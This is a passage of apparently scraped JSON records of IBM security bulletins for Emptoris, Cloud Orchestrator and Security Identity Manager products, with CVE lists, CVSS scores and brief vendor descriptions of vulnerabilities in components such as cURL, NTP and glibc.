Orchestrator Enterprise_](<http://www.ibm.com/support/docview.wss?uid=swg21883102>) \nIBM Tivoli Monitoring| 6.3.0.2| [_Security Bulletin: Multiple vulnerabilities in IBM Tivoli Monitoring shipped with IBM Cloud Orchestrator Enterprise and IBM SmartCloud Orchestrator Enterprise_](<http://www.ibm.com/support/docview.wss?uid=swg21883331>) \n \n \n**Note:** You should verify applying this configuration change does not cause any compatibility issues. If you change the default setting after applying the fix, you will expose yourself to the attack described above. IBM recommends that you review your entire environment to identify other areas where you have enabled the Diffie-Hellman key-exchange protocol used in TLS and take appropriate mitigation and remediation actions. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:32:49", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in IBM Cloud Orchestrator, IBM Cloud Orchestrator Enterprise, and products shipped with IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1788", "CVE-2015-1932", "CVE-2015-2017", "CVE-2015-3183", "CVE-2015-3646", "CVE-2015-4000", "CVE-2015-4734", "CVE-2015-4872", "CVE-2015-4938", "CVE-2015-4947", "CVE-2015-5006", "CVE-2015-7450"], "modified": "2018-06-17T22:32:49", "id": "C7F9DAB9D9A5A1B7F9CB5FED324EFCAC4C72B5C0E11F0AF70FA86C8048D14D8D", "href": "https://www.ibm.com/support/pages/node/599155", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-30T21:39:47", "description": "## Question\n\nSecurity Bulletins for Emptoris Program Management\n\n## Answer\n\n**This article tracks all Security Bulletins for Emptoris Program Management.**\n\nIBM's Product Security Incident Response Team (PSIRT) follows the NIST guidelines for determining the severity rating of the reported vulnerability - see \"[**NVD Vulnerability Severity Ratings**](<http://nvd.nist.gov/cvss.cfm>)\" for details.? Please use this information to take the appropriate actions.\n\nWe recommend that you subscribe to this article to receive notification of future Security Bulletins and advisories posted here. \n\n\nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM _**](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)[**_Emptoris_**](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)**_[ Strategic Supply Management and IBM Emptoris Services Procurement products](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)_**\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Potential security vulnerability in selected fixpacks of WebSphere Application Server affects IBM Emptoris Strategic Supply Management suite of products and IBM Emptoris Services Procurement (CVE-2017-1501)_**](<http://www.ibm.com/support/docview.wss?uid=swg22008410>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities in IBM WebSphere Application Server affects IBM Emptoris Strategic Supply Management suite of products and IBM Emptoris Services Procurement (CVE-2017-1380 CVE-2017-1382)_**](<http://www.ibm.com/support/docview.wss?uid=swg22007774>)\n\n \nMay 2nd 2016\n\n * **[Security Bulletin: Vulnerability in BeanShell affects IBM Emptoris Strategic Supply Management. (CVE-2016-2510)](<http://www.ibm.com/support/docview.wss?uid=swg21982152&myns=swgother&mynp=OCSSYRER&mynp=OCSSYQ89&mync=E&cm_sp=swgother-_-OCSSYRER-OCSSYQ89-_-E>)**\n\n \nDecember 1st 2015\n\n * **[Security Bulletin: Vulnerability in Apache Commons affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement. (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21971731>)**\n\nSeptember 22?2015\n\n * **[Security Bulletin: Cross-Site Scripting vulnerabilities affect IBM Emptoris Strategic Supply Management Platform Emptoris Program Management and Emptoris Supplier Lifecycle Management products (CVE-2015-4971 CVE-2015-4939)](<https://emptoris.support.ibmcloud.com/ics/support/default.asp?deptID=31019&task=knowledge&questionID=22171&languageID=>)**\n\nAugust 26 2015\n\n * **[Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement.](<https://www-304.ibm.com/support/docview.wss?uid=swg21964808>)**\n\nJune 24 2015\n\n * **[Security Bulletin: Vulnerability reported in WebSphere Application Server management port affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement (CVE-2015-1920)](<https://www-304.ibm.com/support/docview.wss?uid=swg21960518>)**\n\nApril 8 2015\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-6593 CVE-2015-0410)](<http://www-01.ibm.com/support/docview.wss?uid=swg21700707>)**\n\nJanuary 272015\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-3566 CVE-2014-6457)](<http://www-01.ibm.com/support/docview.wss?uid=swg21695096>)**\n\nDecember 312014\n\n * **[Security Bulletin: Multiple vulnerabilities related to XML DoS attack IBM Emptoris Strategic Supply Management Suite products (CVE-2014-3529 CVE-2014-3574)](<http://www-01.ibm.com/support/docview.wss?uid=swg21693069>)**\n\nSeptember 17 2014\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-4263 CVE-2014-4244) ](<https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin_multiple_vulnerabilities_in_ibm_java_sdk_affect_ibm_emptoris_strategic_supply_management_ibm_emptoris_rivermine_telecom_expense_management_and_ibm_emptoris_services_procurement_cve_2014_4263_cve_2014_4244?lang=en_us>)**\n\" \n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSYRER\",\"label\":\"Emptoris Program Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-08T16:15:01", "type": "ibm", "title": "Security Bulletins for Emptoris Program Management", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3529", "CVE-2014-3566", "CVE-2014-3574", "CVE-2014-4244", "CVE-2014-4263", "CVE-2014-6457", "CVE-2014-6593", "CVE-2015-0410", "CVE-2015-1920", "CVE-2015-4939", "CVE-2015-4971", "CVE-2015-7450", "CVE-2016-2510", "CVE-2017-1380", "CVE-2017-1382", "CVE-2017-1501"], "modified": "2018-12-08T16:15:01", "id": "0CE9B36358C9687E7112577EA1304074A68EA6DD5359A3F6615F7BA94A6B8E7D", "href": "https://www.ibm.com/support/pages/node/783531", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-30T21:39:49", "description": "## Question\n\nSecurity Bulletins for Emptoris Spend Analysis\n\n## Answer\n\n**This article tracks all Security Bulletins for Emptoris Spend Analysis.**\n\nIBM's Product Security Incident Response Team (PSIRT) follows the NIST guidelines for determining the severity rating of the reported vulnerability - see \"[**NVD Vulnerability Severity Ratings**](<http://nvd.nist.gov/cvss.cfm>)\" for details.? Please use this information to take the appropriate actions.\n\nIn our effort to serve you better we recommend that you subscribe to this article for notification of future Security Bulletins and advisories posted here.\n\nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM _**](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)[**_Emptoris_**](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)**_[ Strategic Supply Management and IBM Emptoris Services Procurement products](<http://www.ibm.com/support/docview.wss?uid=swg22008401>)_**\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Potential security vulnerability in selected fixpacks of WebSphere Application Server affects IBM Emptoris Strategic Supply Management suite of products and IBM Emptoris Services Procurement (CVE-2017-1501)_**](<http://www.ibm.com/support/docview.wss?uid=swg22008410>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities in IBM WebSphere Application Server affects IBM Emptoris Strategic Supply Management suite of products and IBM Emptoris Services Procurement (CVE-2017-1380 CVE-2017-1382)_**](<http://www.ibm.com/support/docview.wss?uid=swg22007774>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Open Source Apache Tomcat Vulnerabilities affect the IBM Emptoris Strategic Supply Management suite of products (CVE-2016-3092)_**](<http://www.ibm.com/support/docview.wss?uid=swg22005604>)\n\n \nDecember 1st 2015\n\n * **[Security Bulletin: Vulnerability in Apache Commons affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement. (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21971731>)**\n\nAugust 26 2015\n\n * [**Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement.** ](<https://www-304.ibm.com/support/docview.wss?uid=swg21964808>)\n \nJune 24 2015\n\n * **[Security Bulletin: Vulnerability reported in WebSphere Application Server management port affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement (CVE-2015-1920)](<https://www-304.ibm.com/support/docview.wss?uid=swg21960518>)**\n\nApril 8 2015\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-6593 CVE-2015-0410)](<http://www-01.ibm.com/support/docview.wss?uid=swg21700707>)**\n\n?January 27 2015\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-3566 CVE-2014-6457)](<http://www-01.ibm.com/support/docview.wss?uid=swg21695096>)**\n\n? September 17 2014\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-4263 CVE-2014-4244) ](<http://www-01.ibm.com/support/docview.wss?uid=swg21684482>)**\n\nAugust 23 2014\n\n * **[IBM Security Bulletin: Multiple vulnerabilities in IBM Emptoris Spend Analysis (CVE-2014-3061 CVE-2014-3035 CVE-2014-4790 CVE-2014-3040)](<http://www-01.ibm.com/support/docview.wss?uid=swg21681277>) ** \n?\n\" \n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSYQAR\",\"label\":\"Emptoris Spend Analysis\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-08T15:10:02", "type": "ibm", "title": "Security Bulletins for Emptoris Spend Analysis", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3035", "CVE-2014-3040", "CVE-2014-3061", "CVE-2014-3566", "CVE-2014-4244", "CVE-2014-4263", "CVE-2014-4790", "CVE-2014-6457", "CVE-2014-6593", "CVE-2015-0410", "CVE-2015-1920", "CVE-2015-7450", "CVE-2016-3092", "CVE-2017-1380", "CVE-2017-1382", "CVE-2017-1501"], "modified": "2018-12-08T15:10:02", "id": "3FDC0101985ADD7D5774F255D78C573813EE11684088944BAF72283AB319514E", "href": "https://www.ibm.com/support/pages/node/783535", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-30T21:39:54", "description": "## Question\n\nSecurity Bulletins for Emptoris Supplier Lifecycle Management\n\n## Answer\n\n**This article tracks all Security Bulletins for Emptoris Supplier Lifecycle Management.**\n\nIBM's Product Security Incident Response Team (PSIRT) follows the NIST guidelines for determining the severity rating of the reported vulnerability - see \"[**NVD Vulnerability Severity Ratings**](<http://nvd.nist.gov/cvss.cfm>)\" for details.? Please use this information to take the appropriate actions.\n\nIn our effort to serve you better we recommend that you subscribe to this article for notification of future Security Bulletins and advisories posted here. \n\n\nNovember 6th 2017\n\n * **_[Security Bulletin: IBM Emptoris Supplier Lifecycle Management is affected by a Cross Site Scripting vulnerability (CVE-2016-6118 CVE-2017-1098)?](<http://www.ibm.com/support/docview.wss?uid=swg22005824>)_**\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Multiple vulnerabilities addressed in the IBM Emptoris Supplier Lifecycle Management product (CVE-2016-8949 CVE-2017-1448 CVE-2016-6121)_**](<http://www.ibm.com/support/docview.wss?uid=swg22006854>)\n\n \nOctober 13th 2017\n\n * [**_Security Bulletin: Open Source Apache Tomcat Vulnerabilities affect the IBM Emptoris Strategic Supply Management suite of products (CVE-2016-3092)_**](<http://www.ibm.com/support/docview.wss?uid=swg22005604>)\n\n \nDecember 1st 2015\n\n * **[Security Bulletin: Vulnerability in Apache Commons affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement. (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21971731>)**\n\n \nSeptember 18?2015\n\n * # [Security Bulletin: Cross-Site Scripting vulnerabilities affect IBM Emptoris Strategic Supply Management Platform Emptoris Program Management and Emptoris Supplier Lifecycle Management products (CVE-2015-4971 CVE-2015-4939)](<http://www-01.ibm.com/support/docview.wss?uid=swg21966754>)\n\nAugust 26 2015\n\n * **[Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement.](<https://www-304.ibm.com/support/docview.wss?uid=swg21964808>)**\n\nJuly 8 2015\n\n * **[Security Bulletin: Vulnerability reported in WebSphere Application Server management port affects IBM Emptoris Strategic Supply Management and IBM Emptoris Services Procurement (CVE-2015-1920)](<https://www-304.ibm.com/support/docview.wss?uid=swg21960518>)**\n\nApril 8 2015\n\n * [IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-6593 CVE-2015-0410)](<http://www-01.ibm.com/support/docview.wss?uid=swg21700707>)\n\nJanuary 27 2015\n\n * [IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-3566 CVE-2014-6457)](<http://www-01.ibm.com/support/docview.wss?uid=swg21695096>)\n\n? September 17 2014\n\n * [IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management IBM Emptoris Rivermine Telecom Expense Management and IBM Emptoris Services Procurement (CVE-2014-4263 CVE-2014-4244)](<http://www-01.ibm.com/support/docview.wss?uid=swg21681277>) \n \n?\n\" \n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSYRC7\",\"label\":\"Emptoris Supplier Lifecycle Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-08T13:10:02", "type": "ibm", "title": "Security Bulletins for Emptoris Supplier Lifecycle Management", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3566", "CVE-2014-4244", "CVE-2014-4263", "CVE-2014-6457", "CVE-2014-6593", "CVE-2015-0410", "CVE-2015-1920", "CVE-2015-4939", "CVE-2015-4971", "CVE-2015-7450", "CVE-2016-3092", "CVE-2016-6118", "CVE-2016-6121", "CVE-2016-8949", "CVE-2017-1098", "CVE-2017-1448"], "modified": "2018-12-08T13:10:02", "id": "D5DD24C882DBB1D9A7CA1FF6A2B5E71A2110BD5524772EF5C4D134F94002AC84", "href": "https://www.ibm.com/support/pages/node/784303", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:50:51", "description": "## Summary\n\nThere are multiple security vulnerabilities in various components used by IBM Security Identity Manager Virtual Appliance\n\n## Vulnerability Details\n\n \n**CVEID:** [_CVE-2014-3565_](<https://vulners.com/cve/CVE-2014-3565>)** \nDESCRIPTION:** Net-SNMP is vulnerable to a denial of service, caused by the improper handling of SNMP traps when started with the \"-OQ\" option. By sending an SNMP trap message containing a variable with a NULL type, a remote attacker could exploit this vulnerability to cause snmptrapd to crash. \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/95638_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/95638>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n \n**CVEID:** [_CVE-2014-3613_](<https://vulners.com/cve/CVE-2014-3613>)** \nDESCRIPTION:** cURL/libcURL could allow a remote attacker to bypass security restrictions, caused by the failure to properly detect and reject domain names for IP addresses. An attacker could exploit this vulnerability to send cookies to an incorrect site. \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/#/vulnerabilities/95925_](<https://exchange.xforce.ibmcloud.com/#/vulnerabilities/95925>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n \n**CVEID:** [_CVE-2014-3707_](<https://vulners.com/cve/CVE-2014-3707>)** \nDESCRIPTION:** cURL/libcURL could allow a remote attacker to obtain sensitive information, caused by an error in the curl_easy_duphandle() function. An attacker could exploit this vulnerability to corrupt heap memory and obtain sensitive information or cause a denial of service. \nCVSS Base Score: 6.4 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/#/vulnerabilities/98562_](<https://exchange.xforce.ibmcloud.com/#/vulnerabilities/98562>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:P) \n\n \n**CVEID:** [_CVE-2014-8121_](<https://vulners.com/cve/CVE-2014-8121>)** \nDESCRIPTION:** GNU C Library (glibc) is vulnerable to a denial of service, caused by the failure to properly check if a file is open by DB_LOOKUP in nss_files/files-XXX.c in the Name Service Switch (NSS). By performing a look-up on a database while iterating over it, an attacker could exploit this vulnerability to cause the application to enter into an infinite loop. \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/102652_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/102652>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n\n\n**CVEID:** [_CVE-2014-8150_](<https://vulners.com/cve/CVE-2014-8150>)** \nDESCRIPTION:** libcURL is vulnerable to CRLF injection, caused by the improper handling of URLs with embedded end-of-line characters. By persuading a victim to click on a specially-crafted URL link using an HTTP proxy, a remote attacker could exploit this vulnerability to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/#/vulnerabilities/100567_](<https://exchange.xforce.ibmcloud.com/#/vulnerabilities/100567>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)\n\n \n**CVEID:** [_CVE-2014-9297_](<https://vulners.com/cve/CVE-2014-9297>)** \nDESCRIPTION:** Network Time Protocol (NTP) Project NTP daemon (ntpd) could allow a remote attacker to conduct spoofing attacks, caused by insufficient entropy in PRNG. An attacker could exploit this vulnerability to spoof the IPv6 address ::1 to bypass ACLs and launch further attacks on the system. \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/#/vulnerabilities/100004_](<https://exchange.xforce.ibmcloud.com/#/vulnerabilities/100004>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n \n**CVEID:** [_CVE-2014-9298_](<https://vulners.com/cve/CVE-2014-9298>)** \nDESCRIPTION:** Network Time Protocol (NTP) Project NTP daemon (ntpd) could allow a remote attacker to obtain sensitive information, caused by the improper validation of the length value in extension field pointers. An attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/#/vulnerabilities/100005_](<https://exchange.xforce.ibmcloud.com/#/vulnerabilities/100005>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N) \n\n**CVEID:** [_CVE-2015-1798_](<https://vulners.com/cve/CVE-2015-1798>)** \nDESCRIPTION:** Network Time Protocol (NTP) Project NTP daemon (ntpd) could allow a remote attacker to bypass security restrictions, caused by the acceptance of packets that do not contain a message authentication code (MAC) as valid packets wen configured for symmetric key authentication. An attacker could exploit this vulnerability using man-in-the-middle techniques to bypass the authentication process. \nCVSS Base Score: 5.4 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/#/vulnerabilities/102051_](<https://exchange.xforce.ibmcloud.com/#/vulnerabilities/102051>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:A/AC:M/Au:N/C:P/I:P/A:P)\n\n**CVEID:** [_CVE-2015-1799_](<https://vulners.com/cve/CVE-2015-1799>)** \nDESCRIPTION:** Network Time Protocol (NTP) Project NTP daemon (ntpd) is vulnerable to a denial of service, caused by an error when using symmetric key authentication. By sending specially-crafted packets to both peering hosts, an attacker could exploit this vulnerability to prevent synchronization. \nCVSS Base Score: 5.4 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/#/vulnerabilities/102052_](<https://exchange.xforce.ibmcloud.com/#/vulnerabilities/102052>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:A/AC:M/Au:N/C:P/I:P/A:P)\n\n \n \n**CVEID:** [_CVE-2015-1819_](<https://vulners.com/cve/CVE-2015-1819>)** \nDESCRIPTION:** Libxml is vulnerable to a denial of service, caused by an XML External Entity Injection (XXE) error in the xmlreader when processing XML data. A remote attacker could exploit this vulnerability to consume all available memory resources. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107272_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107272>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n\n\n \n**CVEID:** [_CVE-2015-2017_](<https://vulners.com/cve/CVE-2015-2017>)** \nDESCRIPTION:** The IBM WebSphere Portal is vulnerable to HTTP response splitting attacks. A remote attacker could exploit this vulnerability using specially-crafted URL to cause the server to return a split response, once the URL is clicked. This would allow the attacker to perform further attacks, such as Web cache poisoning, cross-site scripting, and possibly obtain sensitive infrmation. \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/103991_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/103991>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n \n**CVEID:** [_CVE-2015-2730_](<https://vulners.com/cve/CVE-2015-2730>)** \nDESCRIPTION:** Mozilla Firefox could allow a remote attacker to bypass security restrictions, caused by the failure to properly handle certain exceptional cases by the Elliptical Curve Cryptography (ECC) multiplication for Elliptic Curve Digital Signature Algorithm (ECDSA) signature validation in Network Security Services (NSS). By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to forge signatures. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/#/vulnerabilities/104386_](<https://exchange.xforce.ibmcloud.com/#/vulnerabilities/104386>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N) \n \n\n\n**CVEID:** [_CVE-2015-3143_](<https://vulners.com/cve/CVE-2015-3143>)** \nDESCRIPTION:** libcurl could allow a remote attacker from within the local network to bypass security restrictions, caused by the re-use of recently authenticated connections. By sending a new NTLM-authenticated request, an attacker could exploit this vulnerability to perform unauthorized actions with the privileges of the victim. \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/#/vulnerabilities/102888_](<https://exchange.xforce.ibmcloud.com/#/vulnerabilities/102888>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N)\n\n**CVEID:** [_CVE-2015-3148_](<https://vulners.com/cve/CVE-2015-3148>)** \nDESCRIPTION:** libcurl and cRUL could allow a remote attacker to bypass security restrictions, caused by improper use of the negotiate authentication method. By sending a specially-crafted request, an attacker could exploit this vulnerability to bypass access restrictions and connect as other users. \nCVSS Base Score: 5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/#/vulnerabilities/102878_](<https://exchange.xforce.ibmcloud.com/#/vulnerabilities/102878>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N)\n\n \n \n**CVEID:** [_CVE-2015-3238_](<https://vulners.com/cve/CVE-2015-3238>)** \nDESCRIPTION:** Linux-PAM could allow a local attacker to obtain sensitive information, caused by an error in the _unix_run_helper_binary function in the pam_unix module. An attacker could exploit this vulnerability using an overly large password to enumerate usernames and cause the system to hang. \nCVSS Base Score: 5.1 \nCVSS Temporal Score: See 